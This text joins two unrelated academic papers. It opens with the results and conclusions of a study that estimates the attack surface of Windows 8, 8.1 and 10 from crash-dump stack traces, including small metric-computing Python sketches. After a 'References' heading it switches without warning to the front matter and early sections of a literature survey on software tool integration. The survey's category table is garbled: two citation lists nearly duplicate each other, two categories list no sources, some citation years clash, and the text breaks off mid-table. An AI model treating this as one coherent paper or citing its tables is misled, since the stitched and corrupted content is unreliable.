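The CC and VC metrics can be sketched as simple set-coverage computations: CC as the fraction of system files appearing on at least one stack trace, and VC as the same fraction for files with known vulnerabilities. A minimal sketch under those assumptions; the `coverage_metrics` function and the sample file names are hypothetical.

```python
def coverage_metrics(system_files, vulnerable_files, stack_traces):
    """CC: fraction of system files seen on at least one stack trace.
       VC: fraction of known-vulnerable files seen on at least one trace."""
    seen = set()
    for trace in stack_traces:
        seen.update(trace)
    cc = len(seen & system_files) / len(system_files)
    vc = len(seen & vulnerable_files) / len(vulnerable_files)
    return cc, vc

# Hypothetical file names and traces
system = {"a.c", "b.c", "c.c", "d.c"}
vulns = {"b.c", "d.c"}
traces = [["a.c", "b.c"], ["b.c", "c.c"]]
cc, vc = coverage_metrics(system, vulns, traces)
# cc = 0.75 (3 of 4 files seen), vc = 0.5 (1 of 2 vulnerable files seen)
```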
The table contains the CC and VC metrics, which are the percentage of code in the target software system that appears in at least one stack trace and the percentage of files with security vulnerabilities that appear in at least one stack trace, respectively.

7.2. RQ2: Change Metric

Table 4 contains the FO, SO, and IB metrics for our three comparisons. For the Windows 8 to 8.1 and Windows 8.1 to 10 comparisons, we see a significant difference in the files that are covered for each version, with 39% of the code covered changing for 8 to 8.1 and 58.7% of the code covered changing for 8.1 to 10. While the VC metric for each version of Windows is relatively similar, the significant change in code covered indicates that the attack surface of each version of Windows has changed drastically. Windows 10 – 2014 to 2015 represents a software system that is under development. As expected, we see a significant increase in attack surface size, as measured by RASA, from 2014 to 2015. The growth from 2014 to 2015 is expected, as features for Windows 10 were under active development.

7.3. RQ3: Complexity Metric

**RQ3:** How are security vulnerabilities correlated with fan-in and fan-out measures of code artifacts?

Figures 3 through 8 are heatmaps describing the distribution of the SF and VF metrics for Windows 8, 8.1, and 10. With these heatmaps, we are looking for differences in the distribution of files throughout the system compared to the distribution of vulnerabilities throughout the system, based on incoming and outgoing calls. This would be realized on the heatmap by differences in the distribution of the percentages on the chart. Across all three versions of Windows, we see very similar profiles of complexity types. All three versions have a cluster of files and vulnerabilities around “simple” files, represented by the darker colors in the top left corner of each of the heatmaps.
We also see a “tail” effect in the bottom of the heatmap, with a cluster of complex files and associated vulnerabilities. Finally, each of the three heatmaps has a “valley” between simple and complex files. This indicates that files in Windows tend to be either highly complex or simple, with very few files exhibiting “moderate” complexity.

### Table 3. Percentage of files appearing on crash dump stack traces and vulnerabilities appearing on crash dump stack traces for operating system/year pairings.

<table>
<thead>
<tr> <th>Operating System</th> <th>Year</th> <th>Code Coverage (CC)</th> <th>Vulnerability Coverage (VC)</th> </tr>
</thead>
<tbody>
<tr> <td>Windows 8</td> <td>2014</td> <td>11.0%</td> <td>17.6%</td> </tr>
<tr> <td></td> <td>2015</td> <td>11.9%</td> <td>17.8%</td> </tr>
<tr> <td>Windows 8.1</td> <td>2014</td> <td>8.1%</td> <td>16.3%</td> </tr>
<tr> <td></td> <td>2015</td> <td>10.0%</td> <td>18.1%</td> </tr>
<tr> <td>Windows 10</td> <td>2015</td> <td>7.12%</td> <td>12.1%</td> </tr>
</tbody>
</table>

7.4. RQ4: Boundary Metric

**RQ4:** How often are vulnerabilities seen on the entry and exit points of a software system compared to the rest of the codebase?

For Windows 8.1 in 2015, we found that the BVD metric indicates that only 4% of the vulnerabilities found and fixed were on the entry and exit points of the system. This result suggests that focusing security hardening and testing efforts on the entry and exit points of Windows would leave most vulnerabilities unfound. Based on this result, we confirm the importance of “building security in,” as recommended by McGraw [6]. Treating security as a wrapper around a product, to be handled at entry and exit points, would be a large mistake if applied to Windows, as most bugs are not ultimately fixed there. Considering security at every point of the development process, rather than as something to be added later, is more important than ever based on our results.
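The boundary flagging described in Section 6.5 can be sketched as follows. This is a hedged illustration: the frame names and the `is_windows` predicate are invented, real traces carry binary/function records rather than bare strings, and treating BVD as the fraction of known-vulnerable files that appear as a boundary frame is an assumption made for the example.

```python
def boundary_frame(trace, is_windows):
    """Return the first Windows-related frame directly following a
    non-Windows frame (the 'boundary'), or None if no switch occurs.
    Frames are read in the order they appear in the crash dump."""
    for prev, frame in zip(trace, trace[1:]):
        if not is_windows(prev) and is_windows(frame):
            return frame
    return None

def bvd(traces, is_windows, vulnerable_files):
    """Assumed BVD definition: fraction of known-vulnerable files
    that appear as a boundary frame in at least one trace."""
    boundary_files = set()
    for trace in traces:
        frame = boundary_frame(trace, is_windows)
        if frame is not None:
            boundary_files.add(frame)
    return len(boundary_files & vulnerable_files) / len(vulnerable_files)

# Hypothetical frames; a naming-based predicate stands in for the
# per-binary "Windows Related" flag described in Section 6.5.
is_win = lambda f: f.startswith("win_")
traces = [["app_ui", "app_net", "win_socket", "win_kernel"],
          ["app_ui", "win_gdi"]]
# boundaries: "win_socket" and "win_gdi"
```

A low BVD value, as reported above for Windows 8.1, means most vulnerable files fall outside the `boundary_files` set.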
### Table 4. FO, SO, and IB metrics for the Windows 8 to 8.1, Windows 8.1 to 10, and Windows 10 (2014 to 2015) comparisons.

<table>
<thead>
<tr> <th>Windows</th> <th>Metric</th> <th>Total Files</th> <th>Percentage</th> </tr>
</thead>
<tbody>
<tr> <td>8 to 8.1</td> <td>FO</td> <td>7951</td> <td>23.1%</td> </tr>
<tr> <td></td> <td>SO</td> <td>5490</td> <td>15.9%</td> </tr>
<tr> <td></td> <td>IB</td> <td>21025</td> <td>61.0%</td> </tr>
<tr> <td>8.1 to 10</td> <td>FO</td> <td>13645</td> <td>43.7%</td> </tr>
<tr> <td></td> <td>SO</td> <td>4677</td> <td>15.0%</td> </tr>
<tr> <td></td> <td>IB</td> <td>12870</td> <td>41.3%</td> </tr>
<tr> <td>Windows 10 - 2014 to 2015</td> <td>FO</td> <td>232</td> <td>1.3%</td> </tr>
<tr> <td></td> <td>SO</td> <td>15497</td> <td>89.0%</td> </tr>
<tr> <td></td> <td>IB</td> <td>1674</td> <td>9.6%</td> </tr>
</tbody>
</table>

Figure 3. A heatmap of the distribution of files in Windows 8, based on the number of incoming and outgoing calls from a file. Heat numbers are expressed as the percentage of files in Windows 8 with that distribution.

Figure 4. A heatmap of the distribution of vulnerabilities in Windows 8, based on the number of incoming and outgoing calls from a file. Heat numbers are expressed as the percentage of vulnerabilities in Windows 8 with that distribution.

Figure 5. A heatmap of the distribution of files in Windows 8.1, based on the number of incoming and outgoing calls from a file. Heat numbers are expressed as the percentage of files in Windows 8.1 with that distribution.

Figure 6. A heatmap of the distribution of vulnerabilities in Windows 8.1, based on the number of incoming and outgoing calls from a file. Heat numbers are expressed as the percentage of vulnerabilities in Windows 8.1 with that distribution.

8. Conclusion

For RQ1 (How effectively can stack traces be used to approximate the attack surface of a system?), we replicate the RASA approach for Windows 8, 8.1, and 10 at the file level, improving the granularity, and therefore the applicability, of the approach. Further improvements in mapping specific files on crash dump stack traces to files in the system are needed to improve the VC metric.

For RQ2 (How does the code that is seen on crash dump stack traces drop off, get added, and stay the same across versions and during development of software systems?), we see that the attack surface of Windows changes significantly from version to version and year to year. Therefore, security teams should constantly update the code they consider riskiest in the system based on the changes made by developers during feature development and bug fixing iterations.

For RQ3 (How are security vulnerabilities correlated with fan-in and fan-out measures of code artifacts?), we did not observe a significant positive or negative correlation between the complexity of files and vulnerabilities. However, we have made several observations based on our dataset. First, files in Windows tend to be either highly complex or simple, with very few files being moderately complex. Files in Windows could therefore be classified as either “complex” or “simple,” which would change the approach security professionals take in securing them. Given no other metrics for severity, vulnerabilities that appear in “complex” files are more likely to have wide-reaching impact than vulnerabilities that appear in “simple” files. The complexity of a file could be combined with the frequency with which the file crashes to form a severity metric independent of a qualitative analysis, which would allow the initial assignment of severity for a vulnerability to be automatic. While a human should assign the final severity to each vulnerability after inspection, an automatic severity measure based on crash frequency and complexity could help them classify the vulnerability appropriately.

For RQ4 (How often are vulnerabilities seen on the entry and exit points of a software system compared to the rest of the codebase?), we see that vulnerabilities were rarely on the edge of the system as compared to the distribution of code throughout Windows 8.1.
Focusing security efforts only on entry and exit points would be a mistake, based on this result. Security must be looked at holistically throughout the entire system, as vulnerabilities do not seem to concentrate on the edges of the system. Based on our results, we see that the metrics derived from crash dump stack traces by RASA have positive correlations with security vulnerabilities found in codebases. These metrics could be used by practitioners to guide their efforts in finding and fixing potential security vulnerabilities, and in refactoring and maintaining specific parts of their codebases that are potentially susceptible to vulnerability introduction. We see potential in these new stack trace crash dump metrics as new ways to observe and report on the stability and security properties of software systems.

9. Limitations

These metrics have only been evaluated for Windows 8, 8.1, and 10. This approach may not generalize to other systems without similar studies in different domains. In the absence of an oracle for the complete attack surface, we cannot assess the completeness of our approximation. Our determination of accuracy is currently based only on known vulnerabilities, which may introduce a bias towards code previously seen to be vulnerable. While this may be a reasonable assumption, further exploration is needed. The set of artifacts identified as part of the attack surface is an approximation, and we do not claim to capture all possible vulnerable nodes. Due to code or configuration changes, code that is not on the attack surface may be moved onto the attack surface. However, prioritization of code on the attack surface, using our method or other attack surface identification methods, can be used to reduce security risk.

10. Future Work

Further exploration is needed of the use of stack traces from crash dumps as a potential source of new software security and reliability metrics.
Stack traces from crash dumps are already collected by many companies, and reusing existing datasets that industry teams already maintain is one potential avenue for providing immediate value to practitioners. One of the issues that should be explored is the issue of scale in the use of stack traces from crash dumps. Previous studies have focused on large amounts of data, with stack trace counts reaching into the millions for large software systems. How applicable are crash dump stack trace metrics to smaller software systems without that sense of scale? How many stack traces are required before these metrics are accurate and actionable for practitioners? Are millions of stack traces required, or can practitioners use ten thousand or one thousand stack traces to provide meaningful metrics to their teams? We have shown that RASA does change over time and from version to version for the Windows product. However, we have shown this on yearly cycles and major version releases. Looking at code changes from month to month, or even week to week, and seeing whether this provides useful feedback for security professionals would be the next step in exploring how effective RASA could be in practice. Changing the version analysis from major version releases to minor changes (such as hotfixes) would also help in this respect. Finally, building practical tools that plug into IDEs would be one way to get information from RASA in front of developers and security professionals. However, surveys and interviews to clarify the work environment of security professionals are needed to determine the best way to integrate new information into security workflows.

11. Acknowledgements

The researchers would like to thank team members at Microsoft and Microsoft Research for their invaluable work and feedback on the results found in this paper. We also thank all of the pre-submission readers and reviewers of this paper for their invaluable feedback.

12. References
This is the accepted version of a paper published in *Journal of Systems and Software*. This paper has been peer-reviewed but does not include the final publisher proof-corrections or journal pagination.

Citation for the original published paper (version of record): The Discourse on Tool Integration Beyond Technology, A Literature Survey. *Journal of Systems and Software*, 106: 117-131

Access to the published version may require subscription. N.B. When citing this work, cite the original published paper.

Permanent link to this version: http://urn.kb.se/resolve?urn=urn:nbn:se:kth:diva-169635

The Discourse on Tool Integration Beyond Technology, A Literature Survey

Fredrik Asplund\textsuperscript{a,1,∗}, Martin Törngren\textsuperscript{a}

\textsuperscript{a}KTH Royal Institute of Technology, Department of Machine Design, Division of Mechatronics, Brinellvägen 83, 10044 Stockholm, Sweden

Abstract

The tool integration research area emerged in the 1980s. This survey focuses on those strands of tool integration research that discuss issues beyond technology. We reveal a discourse centered around six frequently mentioned non-functional properties. These properties have been discussed in relation to technology and high level issues. However, while technical details have been covered, high level issues and, by extension, the contexts in which tool integration can be found, are treated indifferently. We conclude that this indifference needs to be challenged, and research on a larger set of stakeholders and contexts initiated. An inventory of the use of classification schemes underlines the difficulty of evolving the classical classification scheme published by Wasserman. Two frequently mentioned redefinitions are highlighted to facilitate their wider use. A closer look at the limited number of research methods and the poor attention to research design indicates a need for a changed set of research methods.
We propose more critical case studies and method diversification through theory triangulation. Additionally, among disparate discourses we highlight several focusing on standardization which are likely to contain relevant findings. This suggests that open communities employed in the context of (pre-)standardization could be especially important in furthering the targeted discourse.

Keywords: Tool Integration, Support Environments

∗Corresponding author. Email addresses: fasplund@kth.se (Fredrik Asplund), martint@kth.se (Martin Törngren)
1Phone: +46 8 790 7405, Fax: +46 8 20 22 87

1. Introduction

Tool integration is a cross-disciplinary research area incorporating influences from many fields, such as Software Engineering, Systems Engineering, Human-Machine Interaction and Economics. Buxton’s STONEMAN report is often mentioned as a starting point for the discussion on tool integration (Buxton, 1980). Buxton (1980) specified the requirements for a support environment for programming Ada by defining the appropriate tools, tool integration mechanisms and interfaces, but also introduced the notion of integrating tools throughout a software project life-cycle. During the 1980s a plethora of initiatives to specify support environments followed, the most well-known being the European Portable Common Tool Environment (PCTE) initiative. In the late 1980s and early 1990s, this carried over into an intense academic discussion regarding many different types of support environments. It was already clear at this point that the research on tool integration consisted of several different strands of research (Brown, 1993a). The identified strands currently include the (overlapping) categories of tool integration mechanisms, technology, frameworks, semantics, modelling, process, dimensions, types, standards and industrial experience (Brown, 1993a; Wicks, 2004; Maalej, 2009).
Throughout the last two decades, the strand that has seen the majority of the activity is the one that focuses on the technology, i.e. the separate mechanisms for achieving tool integration (Wicks and Dewar, 2007). Many valuable findings and insightful discussions are found in this particular strand of research, for instance those related to technological innovations such as Eclipse and Open Services for Lifecycle Collaboration (OSLC). The former is an innovative plug-in framework technology that once turned the entire tool integration market upside down, while the latter is a web API technology that currently shows promise of a large impact. However, the other strands of work are also important, although their influence is currently much more difficult to appraise. This paper focuses on those strands of tool integration research that have implications beyond a specific technology. It contributes to the body of knowledge in tool integration by providing an exploratory literature survey focused on the issues with (and discussion of) tool integration that go beyond solving technological challenges. Our hope is that this will support disruptive change. Incremental changes to technology are valuable, but progress in the tool integration field has been painstakingly slow. If the solutions provided by academia cannot gain traction and impact within industry, then our understanding of industry must be flawed. Identifying missing knowledge might eventually facilitate more relevant technological choices. It could also lead to the removal of unknown, non-technological obstacles hindering the successful deployment of tool integration. Furthermore, it should point to changes to current research approaches to allow for more efficient, conclusive research into the field. 
The background to this work is our participation in the iFEST project (iFEST Consortium, 2013), an EU research project focusing on the specification and implementation of an integration framework for establishing and maintaining tool chains to engineer complex industrial embedded systems. While building support environments is a challenging task due to the sheer complexity of today’s technology, many of the difficulties encountered during iFEST were not linked to technology per se. The choice of a particular approach or technology could make perfect sense to one stakeholder, while another discounted it outright. The ensuing discussions pointed at a lack of adequate research into more high level questions, such as how to prioritize between business models, stakeholders or even different academic discourses. To avoid a situation in which discussions would have degenerated into a mere battle of wills, and to enable an unbiased approach to tool integration, we chose early on to focus on the strands of research that try to reach an overall understanding of what tool integration is. Thus, by identifying the essential core of the cross-disciplinary discourse related to tool integration, we aimed to facilitate future decisions on tradeoffs and identify any weaknesses in the discourse that may make such decisions difficult. To achieve this, we designed a literature survey that focused on what we called the *essence of tool integration* - how it is discussed, the context of this discussion and what the implications are. In other words, the survey focused on the non-technical aspects of the tool integration literature, such as how tool integration is defined, if the concept can be further divided into separate parts, what its purpose is and what is required to achieve it. In addition, the survey considered when these types of questions tended to arise and to what purpose.
This also means that we have tried to go beyond discussing such things as individual meta-models, reference models and patterns, at least beyond what is motivated by our approach. While these capture important aspects of tool integration at an abstract level, they focus on functionality and usually do not cover the even higher levels of abstraction targeted by this study. The basis for the paper is, as will be explained in the subsequent sections, a paper by Wasserman (1990). This paper is a widely recognized seminal paper in the strands of research focusing on issues of tool integration beyond technology. The status of this paper stems from its definition of what later became a much used classification scheme based on different “dimensions” of tool integration, namely *Control, Data, Platform, Presentation* and *Process Integration*. It has been popular to use these dimensions as support when reasoning about tool integration. This scheme is further described in Section 5. The paper is divided into five distinct parts due to the exploratory nature of the study. The first part defines the questions that guided our exploratory investigation (Section 1) and motivates the approach towards answering these questions (Section 2). The second part discusses how these questions led to the allocation of the surveyed papers into initial categories based on common traits or unique contributions related to the initial questions (Section 3). In the third part these categories are used to elicit and analyse four ways in which the discussion of tool integration that goes beyond solving technological challenges is either strong or weak (separate discussions in Sections 4 to 7). Which conclusions can be drawn based on these analyses is discussed in the fourth part of the paper (Section 8). Finally, the core findings and conclusions are summarized in the last part (Section 9). 2.
An Iterative Literature Survey

This section starts by explaining the approach of this literature survey. A case is then made for the validity of the research findings based on the approach and the extra precautions taken.

2.1. The Approach

The findings presented in this paper come from an iterative literature survey, which took place over a period of four years. The first iteration, in which the State of the Art of tool integration was studied, took place early in 2010, during the start of the iFEST project. The 39 sources studied during this iteration consisted of most of the Association for Computing Machinery (ACM) Digital Library (Association for Computing Machinery, 2013) database citation list for Wasserman (1990). The second iteration took place between 2010 and 2012, at the same time as the main part of the iFEST project. As the project was made up of a consortium of 21 partners, consisting of international companies and universities, much input was obtained on different approaches to tool integration. When compiling the most interesting work obtained in regard to the essence of tool integration, it became obvious that most of these sources were based on or oriented around Wasserman (1990). The third iteration took place from late 2012 to early 2013 and focused on the sources in the ACM Digital Library (Association for Computing Machinery, 2013) and Google Scholar (Google, 2013) databases which cite Wasserman (1990). All highly cited sources from 1990 to early 2013 were included. Furthermore, all sources issued from 2007 to 2012 were included in the study regardless of how many times they had been cited. These criteria ensured that all relevant sources received from iFEST partners during the previous iteration were formally included. At this time a total of 75 relevant sources had been identified during the second and third iterations.
Based on the discussion in these sources, a further 15 sources of interest were identified, bringing the total number surveyed during the second and third iterations up to 90. In practice this primarily involved using citations to backtrack to sources discussing classification schemes other than Wasserman’s. In the final iteration the whole set of sources was surveyed again to summarize and double-check the data presented in this paper. Out of 129 sources, 117 were eventually used as a basis for the survey. The 12 sources excluded were deemed not to contribute to the targeted discussion, i.e. the discussion of what we called the essence of tool integration. This decision was based on a careful reading of the complete sources, after which we could not include them in any of the categories described in Section 3. This does not reflect on the quality of these sources or their usefulness in surveys with other focuses.

---
2 One source was not possible to obtain.
3 A high count was defined as 20 citations or more.
4 In comparison with the first iteration, the citation lists contained 90 additional sources fitting the criteria at this time. However, 1 source did not actually refer to Wasserman (1990), 7 sources could not be used due to language difficulties and 7 sources proved to be inaccessible. Only 4 of the excluded sources were from the highly cited category.

2.2. The Validity of the Findings

There is much advice to be found on how to conduct a literature survey, but time must be spent on research design to ensure the trustworthiness of the findings. The approach described in the previous subsection is primarily the result of considering the implications of the survey’s setup on validity. Experimental researchers commonly divide validity into internal and external validity, i.e.
the degree to which a study can “measure what it aims to measure”, and the degree to which the research findings are generalizable to other “populations, settings, treatment variables and measurement variables” respectively (Kothari, 2004). This leads to a strong emphasis on validity, with literature studies often used as one way of proving the internal validity of an experimental study. Other researchers have challenged both these definitions of validity and the priority given to ensuring it, for example Glaser and Strauss in their discussion on the generation of theory through Grounded Theory (Glaser and Strauss, 1967). Nevertheless, validity remains an important issue to consider in any given research design. Given the aim of this literature survey (to understand how the essence of tool integration is discussed, the context of this discussion and what the implications are) the issue of external validity has been treated as a coverage problem. Instead of claiming the possibility to generalize to other sources and focusing on sampling, the scope of the literature survey was set early on to all sources that cited Wasserman (1990). Two consequences of this approach ensured a high coverage of sources related to the discourse on the essence of tool integration: Firstly, most papers discussing the essence of tool integration somehow orient themselves in regard to the most seminal papers in the field, of which Wasserman (1990) is one; and secondly, any high quality source that does not cite Wasserman (1990) is likely to be cited by at least some of the subsequently published sources on the essence of tool integration. The latter means that high quality sources missed by the early iterations could be identified by backtracking from sources in later iterations. 
Two additional choices were also made to eliminate potential sources of selection bias: the choice of databases included both a traditional research database (Association for Computing Machinery, 2013) and a Big Data research database (Google, 2013); and, even though high citation rankings were used to identify relevant historical sources, the sources from 2007 to 2012 were included regardless of their citation rank. This ensured that sources that have not been around for long enough to be widely recognized were included anyway. We can thus be reasonably confident that we have captured the relevant parts of the targeted discourse (particular strands of research in the tool integration literature). However, discourses are dynamic things, which require a sharing of authors, concepts and terminology to connect. There may well be separate discourses that contain relevant findings, but which researchers active in the discourse on tool integration either never encounter or immediately dismiss because the relevance is not obvious. When researchers are able to establish an unexpected connection between two discourses previously thought of as disparate, the results may however be far-reaching. Consider for instance when Reynolds (1987) introduced a computer model mimicking animal aggregation. This work, based on input from biology, has eventually inspired research in such distant fields as networked control and robot navigation. Unfortunately it is not trivial to establish connections between disparate, but principally related, discourses. Therefore, we choose to sample our sources from the literature related to tool integration and those discourses already connected to it, but will return to this discussion at the end of Section 8. Our approach unfortunately makes the issue of internal validity more complex, since it then amounts to proving that the literature survey method is in itself a reasonable means of answering the research questions. 
In other words, even if all relevant literature is consulted, what if it does not reflect the actual discourse on the essence of tool integration? Therefore, to ensure the validity of the survey, a data triangulation (Denzin, 2006) was performed. The categories that had been identified through the survey were used to quantify the answers and questions in a questionnaire issued by the iFEST project in 2010. The focus of the questionnaire was Best Practices in embedded system development with regard to tool integration. It was compiled by leading experts in different aspects of tool integration, more precisely researchers and practitioners from the iFEST partners. Most of these researchers and practitioners each have more than 10 years’ experience of working with tools in their field. Tool integration was thus considered on the basis of in-depth experience with requirements engineering, project management, verification and validation techniques, large IT systems, embedded technology, mechatronics, hardware and software co-design, software architectures, formal verification, etc. The design of the questionnaire included both open and closed questions. The questionnaire was sent out to and answered by 23 respondents at 14 European industrial companies. This ensured that answers were provided by (project and product) managers, engineers from different domains, researchers and software architects. The questionnaire is therefore itself an example of a summary of the most important parts of the current industrial discourse. Discussions among the experts, aimed at identifying a wide set of activities and stakeholders, ensured that the questionnaire was unbiased and covered tool integration relevant to all parts of a product’s life-cycle. Furthermore, the results of the questionnaire were later validated through discussions with other research projects in which the iFEST partners were present.
The results from this comparison are presented at the end of Sections 4, 5, 6 and 7 to support the claim that method bias has not significantly decreased the internal validity.

---
5 The observant reader may object to this triangulation on the grounds that iFEST targeted the embedded systems community. The results of the questionnaire may therefore be biased towards that domain, while the intent of this survey is to consider the whole tool integration field. It is then important to remember that the targeted bias is not selection bias but method bias; the requirement on the triangulation is therefore to unearth problems with validity related to across-the-board differences in industrial practice, and not necessarily to profile the academic discussion against each and every industrial domain.

3. An Initial Categorization

Brown (1993a), Wicks (2004) and Maalej (2009) have provided valuable categorisations of different strands of tool integration research. However, although they were used as a starting point for this literature survey, ultimately they were too broad for our purpose. More refined (possibly overlapping) sub-categories were instead sought. In addition, seminal papers clearly belonging to a particular strand of research were not necessarily the best for capturing all of these cross-disciplinary strands. A more useful approach was to also survey papers with a focus on technology but partially discussing other strands of research. In short, more “finely grained” categories were required than those provided by Brown (1993a), Wicks (2004) and Maalej (2009). The sources therefore had to be continuously categorized during the reading (and re-reading) to establish a suitable classification scheme. This was done iteratively through discussions among the authors based on excerpts from the sources, with external feedback as noted in the Acknowledgments section.
The sources were thus allocated to categories in the process of discovering topics and relationships that were related to the previously mentioned questions linked to the essence of tool integration. The result is a new categorisation scheme that is more fine-grained than already existing ones. The final allocation of sources is presented in Table 1 together with, for convenience, the percentage of sources allocated to each category. The way the topics were handled and the relationships between the categories led to further analysis in four main directions. The reasoning behind this is described below and summarized in Table 2.

**Category 1** includes sources that add to the discussion of non-functional properties related to tool integration. The typical source touches upon this category by referring to different non-functional properties that are either problematic to or addressed by the discussion in the source. However, usually no in-depth motivation is given for how the non-functional properties were chosen or how they relate to each other. The category is detailed further in Section 4.

**Category 2** includes sources that use one or more classification schemes to structure (part of) their discussion. Two other categories merit mentioning together with category 2. The first is **category 3**, which includes sources that elaborate on Wasserman’s types of tool integration. The second is **category 6**, which includes those sources that reference a classification scheme other than that of Wasserman (1990). Together these three categories point to the importance given to classification schemes when discussing tool integration, but also to the deep disagreement on exactly what makes a scheme complete. Further research in the direction of these categories is discussed in Section 5.

**Category 4** includes sources that present or suggest the implementation of a framework, i.e. a realization in software to support tool integration.
This is related to two other categories. The first is **category 5**, which includes sources that present some kind of reference model related to the design for or evaluation of tool integration. Here the term reference model is used to indicate a more abstract definition, which does not have to be immediately realizable. The second is **category 7**, which includes sources that present some kind of product related to tool integration (data integration tools, languages for generating tool integration software, etc.). To some extent these categories “blur” into each other, with the allocation to a specific category depending on the emphasis used by the individual authors. With such a high focus on implementation and providing reference models, one would expect the context of tool integration to have been discussed in-depth. Further research in the direction of these categories is discussed in Section 6.

Category 8 and category 9 are straightforward. The former includes sources that evaluate standards, reference models or specifications related to tool integration. The latter includes sources that provide an in-depth reporting on empirical data related to tool integration. Both of these categories are rather small, which raised concerns regarding the theoretical underpinning of the targeted discourse. This merits a closer look at which research methods are used in these sources, detailed further in Section 7.

Table 1: Categories

Category 1. Discusses non-functional properties in relation to tool integration (53%)
(Osterweil, 1988), (Clément, 1989), (Burl, 1986), (Brown et al., 1992), (Harrison et al., 1992), (Brown, 1988a), (Long and Morris, 1993), (Belkhatir et al., 1989), (Brown and Penrose, 1989), (Finkelstein et al., 1989), (Sum and Iholf, 1994), (Welsh and Yang, 1994), (Gautier et al., 1992a), (Tilley, 1992b), (Tilley and Smith, 1993), (Wasserman, 1994a), (Zeidman, 1994), (Belkhatir, 1993b), (Stavridou, 1993), (Westfechtel, 1993), (Wong, 1993a), (Arndt, 2001), (Endig and Jesko, 2001), (Biel et al., 2002), (Meier et al., 2002), (Lounis et al., 2002), (Schneider and Marquardt, 2002), (Bartelhues, 2003), (Michaud, 2003), (Marquardt and Nagl, 2004), (Tilley et al., 2004), (Dewar, 2005), (Biel et al., 2006), (Kuppermann et al., 2006b), (Kraemer et al., 2006), (Margolese, 2006), (Shi, 2007), (Wicks and Dewar, 2007), (Kornwasser and Abramson, 2008), (Hein et al., 2009), (Maalej, 2009), (Biehl et al., 2010b), (Bartelhues, 2011a), (Leuthäuser and Neiterov, 2010), (Biehl et al., 2010a), (Armengaud et al., 2011), (Biehl et al., 2011), (Cecchelli et al., 2011), (Craiger et al., 2011), (Koozmen, 2011), (Kornwasser and Abramson, 2011), (Peschel et al., 2011), (Wende et al., 2011), (Armengaud et al., 2012), (Biehl et al., 2012a), (Biehl et al., 2012b), (Jucovschi, 2012), (Shenghun, 2012), (Biehl, 2012)

Category 2. Uses a classification scheme to structure the discussion (44%)
(Clément, 1989), (Brown and McDermid, 1984), (Brown et al., 1982), (Cheon and Nam, 1993), (Harrison et al., 1982), (Arnold and Nejahi, 1992), (Bartelhues and Marquardt, 2002), (Biel et al., 1992a), (Brown, 1992b), (Long and Morris, 1993), (Arnold, 1994), (Brown et al., 1994), (Cathale, 1995), (Bouan and Brinkkemper, 1995), (Gautier et al., 1995a), (Gautier et al., 1995b), (Wasserman, 1995), (Baco and Hornowitz, 1996), (Belkhatir, 1997), (Kordon and Mounier, 1997), (Hein, 1998), (Stavridou, 1998), (Westfechtel, 1998), (Wong, 1998), (Grundy et al., 1999), (Arndt, 2001), (Endig and Jesko, 2001), (Michaud et al., 2001), (Krause et al., 2001), (Lezvak et al., 2002), (Schneider and Marquardt, 2002), (Bartelhues, 2003), (Stroede et al., 2003), (Koeven and Müller, 2007), (Margolese, 2007), (Biehl, 2008), (Biehl et al., 2009), (Biehl et al., 2010a), (Biehl et al., 2014b), (Bartelhues, 2010), (Leuthäuser and Neiterov, 2010), (Asplund et al., 2011), (Biehl, 2011), (Biehl et al., 2012), (Craiger et al., 2011), (Kornwasser et al., 2011), (Armengaud et al., 2012), (Biehl et al., 2012a), (Jucovschi, 2012), (Biehl, 2012)

Category 3. Elaborates on Wasserman’s types of tool integration (41%)

Category 4. Presents or suggests a framework implementation (38%)
(Osterweil, 1988), (Beer, 1989), (Chen and Norman, 1992), (Breitmann et al., 1992), (Belkhatir et al., 1994), (Nuseibeh et al., 1994), (Nuseibeh, 1994), (Sum and Iholf, 1994), (Belkhatir and Almeida-Naser, 1995), (Gautier et al., 1995a), (Gautier et al., 1995b), (Tilley, 1995), (Emmerich, 1996), (Valetto and Kaiser, 1996), (Belkhatir, 1997), (Kordon and Mounier, 1997), (Pohl and Weidenhaupt, 1997), (Pohl et al., 1999), (Heise, 1999), (Westfechtel, 1999), (Grundy et al., 2001), (Arzadi and Jasek, 2001), (Bandy et al., 2002), (Marquardt and Nagl, 2004), (Mampilly et al., 2005), (Kouamou et al., 2005), (Barzou et al., 2006), (Mandala, 2007), (Heis et al., 2008), (Wende et al., 2010), (Arzadi and Jasek, 2011), (Biehl et al., 2011), (Ceccarelli et al., 2011), (Nakagawa et al., 2011), (Wende et al., 2011), (Biehl et al., 2012), (Jaouadi and Al-Sudairi, 2012), (Biehl et al., 2013), (Nakagawa and Al-Sudairi, 2013)

Category 5. Presents a reference model (34%)
(Clement, 1990), (Kael, 1990), (Brown and Seiler, 1992), (Brown et al., 1992), (Harrison et al., 1992), (Arnold, 1994), (Brown et al., 1994), (Nuseibeh, 1994), (Welsh and Yang, 1994), (Tilley, 1995), (Barrett et al., 1996), (Chittister and Haimes, 1996), (Tilley et al., 1996), (Kordon and Mounier, 1997), (Kordon, 1998), (Deier and Durante, 1998), (Deier and Jasek, 2001), (Kordon and Mounier, 2001), (Kouamou et al., 2005), (Barzou et al., 2006), (Mandala, 2007), (Heis et al., 2008), (Wende et al., 2010), (Arzadi and Jasek, 2011), (Biehl et al., 2011), (Ceccarelli et al., 2011), (Nakagawa et al., 2011), (Wende et al., 2011), (Biehl et al., 2012), (Jaouadi and Al-Sudairi, 2012), (Biehl et al., 2013), (Nakagawa and Al-Sudairi, 2013)

Category 6. Uses a classification scheme other than Wasserman’s (28%)
(Clement, 1990), (Kael, 1990), (Brown and Seiler, 1992), (Brown et al., 1992), (Harrison et al., 1992), (Arnold, 1994), (Brown et al., 1994), (Nuseibeh, 1994), (Welsh and Yang, 1994), (Tilley, 1995), (Barrett et al., 1996), (Chittister and Haimes, 1996), (Tilley et al., 1996), (Kordon and Mounier, 1997), (Kordon, 1998), (Deier and Durante, 1998), (Deier and Jasek, 2001), (Kordon and Mounier, 2001), (Kouamou et al., 2005), (Barzou et al., 2006), (Mandala, 2007), (Heis et al., 2008), (Wende et al., 2010), (Arzadi and Jasek, 2011), (Nakagawa et al., 2011), (Wende et al., 2011), (Biehl et al., 2012), (Jaouadi and Al-Sudairi, 2012), (Biehl et al., 2013), (Nakagawa and Al-Sudairi, 2013)

Category 7.
Presents a product related to tool integration (14%)

Table 2: Further Analysis based on Topics and Relationships

<table>
<thead>
<tr>
<th>Category</th>
<th>Motivation</th>
<th>Discussed Further in Section</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>Non-functional properties often referred to, but in vague terms.</td>
<td>4</td>
</tr>
<tr>
<td>2, 3 and 6</td>
